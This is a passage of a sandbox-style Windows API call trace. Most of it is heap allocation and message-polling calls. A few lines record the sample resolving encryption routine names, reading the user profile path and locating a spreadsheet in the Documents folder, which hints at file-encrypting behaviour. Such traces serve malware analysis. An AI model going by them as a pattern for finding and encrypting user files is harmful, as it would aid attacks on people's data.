hHeap=0x970000) returned 1 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0263.108] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0263.108] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0263.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0263.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.111] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0263.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0263.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0263.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0263.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0263.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0263.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0263.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0263.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0263.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0263.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0263.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.116] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.117] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0263.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Fuv1mdjpidzq-6YHGh.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb8b5a0, ftCreationTime.dwHighDateTime=0x1d5ce6c, ftLastAccessTime.dwLowDateTime=0xe1b73c70, ftLastAccessTime.dwHighDateTime=0x1d5b5c3, ftLastWriteTime.dwLowDateTime=0xe1b73c70, ftLastWriteTime.dwHighDateTime=0x1d5b5c3, nFileSizeHigh=0x0, nFileSizeLow=0x1324e, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Fuv1mdjpidzq-6YHGh.xlsx", cAlternateFileName="FUV1MD~1.XLS")) returned 0xa87590 [0263.118] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0263.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.119] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0263.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.120] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.121] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.121] RtlAllocateHeap (HeapHandle=0x970000, 